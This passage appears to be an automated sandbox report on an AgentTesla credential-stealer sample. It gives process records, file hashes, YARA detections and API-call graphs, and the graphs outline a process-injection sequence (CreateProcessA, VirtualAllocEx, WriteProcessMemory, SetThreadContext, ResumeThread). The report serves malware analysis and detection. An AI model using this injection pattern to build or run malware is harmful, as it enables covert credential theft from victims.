                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:19:15:40
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                      Imagebase:0x530000
                                                      File size:985'600 bytes
                                                      MD5 hash:74421477FAFAF6BEB9D8E3806E1F6643
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:19:15:40
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                      Imagebase:0x750000
                                                      File size:985'600 bytes
                                                      MD5 hash:74421477FAFAF6BEB9D8E3806E1F6643
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:9.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:4.1%
                                                        Total number of Nodes:197
                                                        Total number of Limit Nodes:13
                                                        execution_graph 25928 5874293 25929 5870be4 CallWindowProcW 25928->25929 25930 58742aa 25929->25930 25931 316d340 25932 316d386 25931->25932 25936 316d520 25932->25936 25939 316d511 25932->25939 25933 316d473 25937 316d54e 25936->25937 25942 316ce58 25936->25942 25937->25933 25940 316ce58 DuplicateHandle 25939->25940 25941 316d54e 25940->25941 25941->25933 25943 316d588 DuplicateHandle 25942->25943 25944 316d61e 25943->25944 25944->25937 25896 17bd01c 25897 17bd034 25896->25897 25898 17bd08e 25897->25898 25901 5870abc 25897->25901 25905 5872c08 25897->25905 25902 5870ac7 25901->25902 25904 5872c69 25902->25904 25909 5870be4 25902->25909 25906 5872c10 25905->25906 25907 5870be4 CallWindowProcW 25906->25907 25908 5872c69 25906->25908 25907->25908 25910 5870bef 25909->25910 25911 587435a CallWindowProcW 25910->25911 25912 5874309 25910->25912 25911->25912 25912->25904 25913 316afb8 25914 316afb9 25913->25914 25918 316b0b0 25914->25918 25923 316b0a0 25914->25923 25915 316afc7 25919 316b0e4 25918->25919 25920 316b0c1 25918->25920 25919->25915 25920->25919 25921 316b2e8 GetModuleHandleW 25920->25921 25922 316b315 25921->25922 25922->25915 25925 316b0a4 25923->25925 25924 316b0e4 25924->25915 25925->25924 25926 316b2e8 GetModuleHandleW 25925->25926 25927 316b315 25926->25927 25927->25915 25945 3164668 25946 3164669 25945->25946 25947 3164686 25946->25947 25949 3164779 25946->25949 25950 316477c 25949->25950 25954 3164878 25950->25954 25958 3164888 25950->25958 25955 316487c 25954->25955 25956 316498c 25955->25956 25962 3164248 25955->25962 25959 3164889 25958->25959 25960 316498c 25959->25960 25961 3164248 CreateActCtxA 25959->25961 25961->25960 25963 3165918 CreateActCtxA 25962->25963 25965 31659db 25963->25965 25966 5876dd8 25968 5876df2 25966->25968 25967 5876e1b 25968->25967 25971 5876e60 25968->25971 25976 5876e70 25968->25976 25972 5876e70 25971->25972 25981 5876e91 25972->25981 25985 5876ea0 25972->25985 25973 5876e88 25973->25968 25977 5876e7c 25976->25977 25979 5876e91 15 API calls 25977->25979 25980 5876ea0 15 API calls 25977->25980 25978 5876e88 25978->25968 25979->25978 25980->25978 25982 5876ea0 25981->25982 25983 5876f28 25982->25983 25989 5875a38 25982->25989 25983->25973 25987 5876ebc 25985->25987 25986 5876f28 25986->25973 25987->25986 25988 5875a38 15 API calls 25987->25988 25988->25987 25991 5875a43 25989->25991 25990 5877222 25990->25982 25991->25990 26003 5879b1e 25991->26003 26008 587a1f1 25991->26008 26012 5879c68 25991->26012 26017 587a7ab 25991->26017 26022 587a2eb 25991->26022 26026 587a34e 25991->26026 26031 587a1af 25991->26031 26035 5879a80 25991->26035 26039 587a4a0 25991->26039 26044 58799d9 25991->26044 26049 587a3dd 25991->26049 26004 5879b21 26003->26004 26005 5879a49 26004->26005 26053 587b638 26004->26053 26059 587b648 26004->26059 26080 587b5f0 26008->26080 26086 587b600 26008->26086 26009 587a209 26013 587a50a 26012->26013 26103 5879338 26013->26103 26107 5879330 26013->26107 26014 5879a49 26014->26014 26018 5879b21 26017->26018 26018->26017 26019 5879a49 26018->26019 26020 587b638 4 API calls 26018->26020 26021 587b648 4 API calls 26018->26021 26020->26018 26021->26018 26024 5879330 2 API calls 26022->26024 26025 5879338 WriteProcessMemory 26022->26025 26023 587a30f 26024->26023 26025->26023 26027 587a37a 26026->26027 26029 5879330 2 API calls 26027->26029 26030 5879338 WriteProcessMemory 26027->26030 26028 587a3b4 26029->26028 26030->26028 26114 587af03 26031->26114 26121 587af10 26031->26121 26032 587a1c7 26127 587af4b 26035->26127 26133 587af58 26035->26133 26036 5879a49 26040 587a4a6 26039->26040 26041 5879a49 26040->26041 26042 5879330 2 API calls 26040->26042 26043 5879338 WriteProcessMemory 26040->26043 26042->26041 26043->26041 26045 58799f5 26044->26045 26143 58795c0 26045->26143 26147 58795b4 26045->26147 26151 5879423 26049->26151 26155 5879428 26049->26155 26050 587a3ff 26054 587b645 26053->26054 26065 58790f0 26054->26065 26069 5879198 26054->26069 26076 58790eb 26054->26076 26055 587b670 26055->26004 26060 587b65d 26059->26060 26062 58790f0 ResumeThread 26060->26062 26063 58790eb ResumeThread 26060->26063 26064 5879198 2 API calls 26060->26064 26061 587b670 26061->26004 26062->26061 26063->26061 26064->26061 26066 5879121 ResumeThread 26065->26066 26068 5879161 26066->26068 26068->26055 26070 5879121 ResumeThread 26069->26070 26071 587919b Wow64SetThreadContext 26069->26071 26075 5879161 26070->26075 26074 587922d 26071->26074 26074->26055 26075->26055 26077 58790f0 ResumeThread 26076->26077 26079 5879161 26077->26079 26079->26055 26081 587b615 26080->26081 26085 5879198 2 API calls 26081->26085 26092 58791a0 26081->26092 26096 5879270 26081->26096 26082 587b62b 26082->26009 26085->26082 26087 587b615 26086->26087 26089 58791a0 Wow64SetThreadContext 26087->26089 26090 5879270 2 API calls 26087->26090 26091 5879198 2 API calls 26087->26091 26088 587b62b 26088->26009 26089->26088 26090->26088 26091->26088 26093 58791e5 Wow64SetThreadContext 26092->26093 26095 587922d 26093->26095 26095->26082 26097 5879273 VirtualAllocEx 26096->26097 26098 58791f9 Wow64SetThreadContext 26096->26098 26102 58792f5 26097->26102 26100 587922d 26098->26100 26100->26082 26102->26082 26104 5879380 WriteProcessMemory 26103->26104 26106 58793d7 26104->26106 26106->26014 26108 58792b9 VirtualAllocEx 26107->26108 26110 5879333 WriteProcessMemory 26107->26110 26111 58792f5 26108->26111 26113 58793d7 26110->26113 26111->26014 26113->26014 26115 587ae96 26114->26115 26116 587af0a 26114->26116 26115->26032 26118 58791a0 Wow64SetThreadContext 26116->26118 26119 5879270 2 API calls 26116->26119 26120 5879198 2 API calls 26116->26120 26117 587af3b 26117->26032 26118->26117 26119->26117 26120->26117 26122 587af25 26121->26122 26124 58791a0 Wow64SetThreadContext 26122->26124 26125 5879270 2 API calls 26122->26125 26126 5879198 2 API calls 26122->26126 26123 587af3b 26123->26032 26124->26123 26125->26123 26126->26123 26128 587af6d 26127->26128 26130 5879330 2 API calls 26128->26130 26131 5879270 2 API calls 26128->26131 26139 5879278 26128->26139 26129 587af8c 26129->26036 26130->26129 26131->26129 26134 587af6d 26133->26134 26136 5879330 2 API calls 26134->26136 26137 5879270 2 API calls 26134->26137 26138 5879278 VirtualAllocEx 26134->26138 26135 587af8c 26135->26036 26136->26135 26137->26135 26138->26135 26140 58792b8 VirtualAllocEx 26139->26140 26142 58792f5 26140->26142 26142->26129 26144 5879649 CreateProcessA 26143->26144 26146 587980b 26144->26146 26148 58795c0 CreateProcessA 26147->26148 26150 587980b 26148->26150 26152 5879428 ReadProcessMemory 26151->26152 26154 58794b7 26152->26154 26154->26050 26156 5879473 ReadProcessMemory 26155->26156 26158 58794b7 26156->26158 26158->26050

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 320 5879330-5879331 321 5879333-5879386 320->321 322 58792b9-58792f3 VirtualAllocEx 320->322 328 5879396-58793d5 WriteProcessMemory 321->328 329 5879388-5879394 321->329 326 58792f5-58792fb 322->326 327 58792fc-5879321 322->327 326->327 333 58793d7-58793dd 328->333 334 58793de-587940e 328->334 329->328 333->334
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 058792E6
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 058793C8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: AllocMemoryProcessVirtualWrite
                                                        • String ID:
                                                        • API String ID: 645232735-0
                                                        • Opcode ID: 9f7131f9384454bf61ff876b617460a62f0f41998a36113882c68f08747a8834
                                                        • Instruction ID: 8ff53eb1b80975e2b11dad423ad937403fa9512b6d49e3ab883298c8866df85a
                                                        • Opcode Fuzzy Hash: 9f7131f9384454bf61ff876b617460a62f0f41998a36113882c68f08747a8834
                                                        • Instruction Fuzzy Hash: 3F41787290024D9FDF10DFAAC844BEEBBF5FF48320F108829E919A7250D7799954CBA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 339 5879198-5879199 340 5879121-587915f ResumeThread 339->340 341 587919b-58791eb 339->341 348 5879161-5879167 340->348 349 5879168-587918d 340->349 346 58791ed-58791f9 341->346 347 58791fb-587922b Wow64SetThreadContext 341->347 346->347 353 5879234-5879264 347->353 354 587922d-5879233 347->354 348->349 354->353
                                                        APIs
                                                        • ResumeThread.KERNELBASE ref: 05879152
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0587921E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: Thread$ContextResumeWow64
                                                        • String ID:
                                                        • API String ID: 1826235168-0
                                                        • Opcode ID: c214e2287f078abe92b673af0c1d77ccde58366c1808f7cd74cb8738a9d8e208
                                                        • Instruction ID: ee358069b18411524c561e98bfd9c4664ff2126aa89f105a39a1f1287db4628b
                                                        • Opcode Fuzzy Hash: c214e2287f078abe92b673af0c1d77ccde58366c1808f7cd74cb8738a9d8e208
                                                        • Instruction Fuzzy Hash: 68415971D002098FDB10DFAAC8857AEBBF5EF98324F14842AD569E7240DB789945CFA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 360 5879270-5879271 361 5879273-58792f3 VirtualAllocEx 360->361 362 58791f9-587922b Wow64SetThreadContext 360->362 370 58792f5-58792fb 361->370 371 58792fc-5879321 361->371 367 5879234-5879264 362->367 368 587922d-5879233 362->368 368->367 370->371
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0587921E
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 058792E6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: AllocContextThreadVirtualWow64
                                                        • String ID:
                                                        • API String ID: 2727713192-0
                                                        • Opcode ID: 54eed401e38244253325386584526c95215d77b3f82930feefdd60accf5597e0
                                                        • Instruction ID: 9590fe8ac02179023d491220fb4d8c1104e01644f5ba993b3f4e032be54c6b85
                                                        • Opcode Fuzzy Hash: 54eed401e38244253325386584526c95215d77b3f82930feefdd60accf5597e0
                                                        • Instruction Fuzzy Hash: D1317872D002498FDB20DFAAC844BEFBBF5EF98324F148419D529A7250DB799944CFA1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 378 58795b4-5879655 381 5879657-5879661 378->381 382 587968e-58796ae 378->382 381->382 383 5879663-5879665 381->383 389 58796e7-5879716 382->389 390 58796b0-58796ba 382->390 384 5879667-5879671 383->384 385 5879688-587968b 383->385 387 5879675-5879684 384->387 388 5879673 384->388 385->382 387->387 391 5879686 387->391 388->387 396 587974f-5879809 CreateProcessA 389->396 397 5879718-5879722 389->397 390->389 392 58796bc-58796be 390->392 391->385 394 58796e1-58796e4 392->394 395 58796c0-58796ca 392->395 394->389 398 58796ce-58796dd 395->398 399 58796cc 395->399 410 5879812-5879898 396->410 411 587980b-5879811 396->411 397->396 401 5879724-5879726 397->401 398->398 400 58796df 398->400 399->398 400->394 402 5879749-587974c 401->402 403 5879728-5879732 401->403 402->396 405 5879736-5879745 403->405 406 5879734 403->406 405->405 408 5879747 405->408 406->405 408->402 421 587989a-587989e 410->421 422 58798a8-58798ac 410->422 411->410 421->422 423 58798a0 421->423 424 58798ae-58798b2 422->424 425 58798bc-58798c0 422->425 423->422 424->425 426 58798b4 424->426 427 58798c2-58798c6 425->427 428 58798d0-58798d4 425->428 426->425 427->428 429 58798c8 427->429 430 58798e6-58798ed 428->430 431 58798d6-58798dc 428->431 429->428 432 5879904 430->432 433 58798ef-58798fe 430->433 431->430 435 5879905 432->435 433->432 435->435
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 058797F6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 9663d2c4b1f0265ece909112f505578286515e500928c5f4381fb45dfe096609
                                                        • Instruction ID: 6ab83faf22fa4daa1f47db3edbaf7b946809d0664b3f3a990b261ddf94376b9d
                                                        • Opcode Fuzzy Hash: 9663d2c4b1f0265ece909112f505578286515e500928c5f4381fb45dfe096609
                                                        • Instruction Fuzzy Hash: 8FA14871D0425D9FEB20CFA8C881BEDBBB2BB48314F1581A9E819E7250DB749D85CF91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 436 58795c0-5879655 438 5879657-5879661 436->438 439 587968e-58796ae 436->439 438->439 440 5879663-5879665 438->440 446 58796e7-5879716 439->446 447 58796b0-58796ba 439->447 441 5879667-5879671 440->441 442 5879688-587968b 440->442 444 5879675-5879684 441->444 445 5879673 441->445 442->439 444->444 448 5879686 444->448 445->444 453 587974f-5879809 CreateProcessA 446->453 454 5879718-5879722 446->454 447->446 449 58796bc-58796be 447->449 448->442 451 58796e1-58796e4 449->451 452 58796c0-58796ca 449->452 451->446 455 58796ce-58796dd 452->455 456 58796cc 452->456 467 5879812-5879898 453->467 468 587980b-5879811 453->468 454->453 458 5879724-5879726 454->458 455->455 457 58796df 455->457 456->455 457->451 459 5879749-587974c 458->459 460 5879728-5879732 458->460 459->453 462 5879736-5879745 460->462 463 5879734 460->463 462->462 465 5879747 462->465 463->462 465->459 478 587989a-587989e 467->478 479 58798a8-58798ac 467->479 468->467 478->479 480 58798a0 478->480 481 58798ae-58798b2 479->481 482 58798bc-58798c0 479->482 480->479 481->482 483 58798b4 481->483 484 58798c2-58798c6 482->484 485 58798d0-58798d4 482->485 483->482 484->485 486 58798c8 484->486 487 58798e6-58798ed 485->487 488 58798d6-58798dc 485->488 486->485 489 5879904 487->489 490 58798ef-58798fe 487->490 488->487 492 5879905 489->492 490->489 492->492
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 058797F6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 8681bc33418afd569dc4a820ac692f38b1437fb5bb1eb5957c34515b00c23f3b
                                                        • Instruction ID: 3e4f4aee38ca9bba7d448505251f42a6d88c50367d603f6f2ea1af5349ace3c3
                                                        • Opcode Fuzzy Hash: 8681bc33418afd569dc4a820ac692f38b1437fb5bb1eb5957c34515b00c23f3b
                                                        • Instruction Fuzzy Hash: D4914871D0025D9FEB20CFA8C881BEDBBB2BB48314F1581A9E819E7250DB749D85CF91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 493 316b0b0-316b0bf 494 316b0c1-316b0ce call 316aa74 493->494 495 316b0eb-316b0ef 493->495 502 316b0e4 494->502 503 316b0d0 494->503 496 316b103-316b144 495->496 497 316b0f1-316b0fb 495->497 504 316b146-316b14e 496->504 505 316b151-316b15f 496->505 497->496 502->495 548 316b0d6 call 316b348 503->548 549 316b0d6 call 316b339 503->549 504->505 507 316b183-316b185 505->507 508 316b161-316b166 505->508 506 316b0dc-316b0de 506->502 509 316b220-316b2e0 506->509 510 316b188-316b18f 507->510 511 316b171 508->511 512 316b168-316b16f call 316aa80 508->512 543 316b2e2-316b2e5 509->543 544 316b2e8-316b313 GetModuleHandleW 509->544 514 316b191-316b199 510->514 515 316b19c-316b1a3 510->515 513 316b173-316b181 511->513 512->513 513->510 514->515 518 316b1a5-316b1ad 515->518 519 316b1b0-316b1b9 call 316aa90 515->519 518->519 524 316b1c6-316b1cb 519->524 525 316b1bb-316b1c3 519->525 526 316b1cd-316b1d4 524->526 527 316b1e9-316b1f6 524->527 525->524 526->527 529 316b1d6-316b1e6 call 316aaa0 call 316aab0 526->529 534 316b1f8-316b216 527->534 535 316b219-316b21f 527->535 529->527 534->535 543->544 545 316b315-316b31b 544->545 546 316b31c-316b330 544->546 545->546 548->506 549->506
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0316B306
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: f5997737ad19f2a15dddf31e2dc8aaab2fc88fd68a56d271869a30d0f53659c6
                                                        • Instruction ID: eca74638a62fdda93a11ea4cad235d8ed90a3a6133aa6ccb67fe49b769e277f1
                                                        • Opcode Fuzzy Hash: f5997737ad19f2a15dddf31e2dc8aaab2fc88fd68a56d271869a30d0f53659c6
                                                        • Instruction Fuzzy Hash: AE7157B0A00B459FD724DFAAD54475ABBF1FF88300F04892DD04ADBA50DB74E856CB90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 550 316590d-316590e 551 3165915 550->551 552 3165910-3165912 550->552 553 3165919-31659d9 CreateActCtxA 551->553 552->553 554 3165914 552->554 556 31659e2-3165a3c 553->556 557 31659db-31659e1 553->557 554->551 564 3165a3e-3165a41 556->564 565 3165a4b-3165a4f 556->565 557->556 564->565 566 3165a60 565->566 567 3165a51-3165a5d 565->567 568 3165a61 566->568 567->566 568->568
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 031659C9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: c710cf894f6e6a20ffc69229f53b75908692799e55fbea86bbac1e075069baa5
                                                        • Instruction ID: 02a46b06c4b5449a14ca3bd9ac2d6fac4eddaba07b6f8d0c1e4d6e176c488b14
                                                        • Opcode Fuzzy Hash: c710cf894f6e6a20ffc69229f53b75908692799e55fbea86bbac1e075069baa5
                                                        • Instruction Fuzzy Hash: 0141F2B0C00719CFDB24DFA9C884B9DBBF6BF49304F24816AD408AB251DB756946CF90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 570 5870be4-58742fc 573 5874302-5874307 570->573 574 58743ac-58743cc call 5870abc 570->574 575 587435a-5874392 CallWindowProcW 573->575 576 5874309-5874340 573->576 581 58743cf-58743dc 574->581 578 5874394-587439a 575->578 579 587439b-58743aa 575->579 584 5874342-5874348 576->584 585 5874349-5874358 576->585 578->579 579->581 584->585 585->581
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05874381
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: 7d6383efd81d686def44ccb3951c9ae3ec5bd9fc514b173e26445b26f5c9123f
                                                        • Instruction ID: db6b231ad49a7308d55aa2177d5ac3bd11c1f48446f402e15e9abde23e87651c
                                                        • Opcode Fuzzy Hash: 7d6383efd81d686def44ccb3951c9ae3ec5bd9fc514b173e26445b26f5c9123f
                                                        • Instruction Fuzzy Hash: 354129B4900309CFCB14CF99C888EAABBF5FF88314F258559E519AB321D734E841CBA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 587 3164248-31659d9 CreateActCtxA 591 31659e2-3165a3c 587->591 592 31659db-31659e1 587->592 599 3165a3e-3165a41 591->599 600 3165a4b-3165a4f 591->600 592->591 599->600 601 3165a60 600->601 602 3165a51-3165a5d 600->602 603 3165a61 601->603 602->601 603->603
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 031659C9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 5542dbf5d6f980f21ec0e58ae41749b5013486a35e9d4ab28feeec90994f2ebb
                                                        • Instruction ID: c845c89f844f3637f36eeca623d8c05b28d6000ec62c1b804958881125f28f8e
                                                        • Opcode Fuzzy Hash: 5542dbf5d6f980f21ec0e58ae41749b5013486a35e9d4ab28feeec90994f2ebb
                                                        • Instruction Fuzzy Hash: 4841CFB0D0061DCFDB24CFAAC884B9EBBB6FF49304F24816AD408AB255DB756945DF90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 605 5879338-5879386 607 5879396-58793d5 WriteProcessMemory 605->607 608 5879388-5879394 605->608 610 58793d7-58793dd 607->610 611 58793de-587940e 607->611 608->607 610->611
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 058793C8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 05f9e947898045525ebbd3346667b1fd1449b937174d0ce2d276194f0191ea6e
                                                        • Instruction ID: aded56f5fe672a668ca8e766e1a48bf1f0c68f19e08dd8e88eb42786268fa688
                                                        • Opcode Fuzzy Hash: 05f9e947898045525ebbd3346667b1fd1449b937174d0ce2d276194f0191ea6e
                                                        • Instruction Fuzzy Hash: DB21397190034D9FDB10CFAAC881BEEBBF5FF48320F108829E919A7240D7789944CBA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 615 316ce58-316d61c DuplicateHandle 617 316d625-316d642 615->617 618 316d61e-316d624 615->618 618->617
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0316D54E,?,?,?,?,?), ref: 0316D60F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 1069867c509c4aab25175c02559a890ffb12f57b249bbb25d8b6249ed6213658
                                                        • Instruction ID: c0744664715d596c52ec21d0a2cee8869dd0206131cda7ea1f6f512e7920ac49
                                                        • Opcode Fuzzy Hash: 1069867c509c4aab25175c02559a890ffb12f57b249bbb25d8b6249ed6213658
                                                        • Instruction Fuzzy Hash: 0821E6B5900248EFDB10CF9AD984AEEFFF4EB48320F14841AE918A7310D374A950CFA5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 621 5879423-58794b5 ReadProcessMemory 625 58794b7-58794bd 621->625 626 58794be-58794ee 621->626 625->626
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 058794A8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 24cbb944c12b12264b5180160c090712e74c9e2e1890178c556256c3674bfed5
                                                        • Instruction ID: aaac81a5bbaa578b17dc7f0c57cc4592772409407aedeb9fd20db53a8a76406a
                                                        • Opcode Fuzzy Hash: 24cbb944c12b12264b5180160c090712e74c9e2e1890178c556256c3674bfed5
                                                        • Instruction Fuzzy Hash: DB2139B1C0024D9FDB10DFAAC881AEEFBF5FF48320F148429E919A7250D7799944DBA4
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 058794A8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: f76eb70c9c8d61b9fff5a470b7ddd964fe9916ef091db0f2e6d956d8c0ba36df
                                                        • Instruction ID: 5e393f3484dc415593e12cf39bd35e8cbcadf659a26632e7b34bc1e819bbe095
                                                        • Opcode Fuzzy Hash: f76eb70c9c8d61b9fff5a470b7ddd964fe9916ef091db0f2e6d956d8c0ba36df
